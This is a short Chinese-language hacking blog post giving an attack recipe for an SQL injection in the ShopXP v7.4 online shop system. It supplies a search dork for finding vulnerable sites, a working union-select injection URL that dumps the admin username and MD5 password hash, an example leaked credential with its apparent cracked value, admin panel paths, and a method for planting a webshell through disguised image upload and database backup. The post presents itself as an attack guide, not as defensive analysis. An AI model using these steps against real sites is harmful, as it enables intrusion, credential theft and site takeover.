shopxp网上购物系统 v7.4 SQL注入漏洞
关键字:inurl:shopxp_news.asp
注入代码:TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
爆出用户名和密码 注意:用户名和密码是连在一起的,后十六位是密码MD5加密 adminb1481eca94b12f75 =====admin b1481eca94b12f75(38983806 )
后台:/admin 或者/admin_shopxp
拿webshell方法:把小马改为图片格式后缀准备上传,利用数据库备份搞定webshell
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3672.html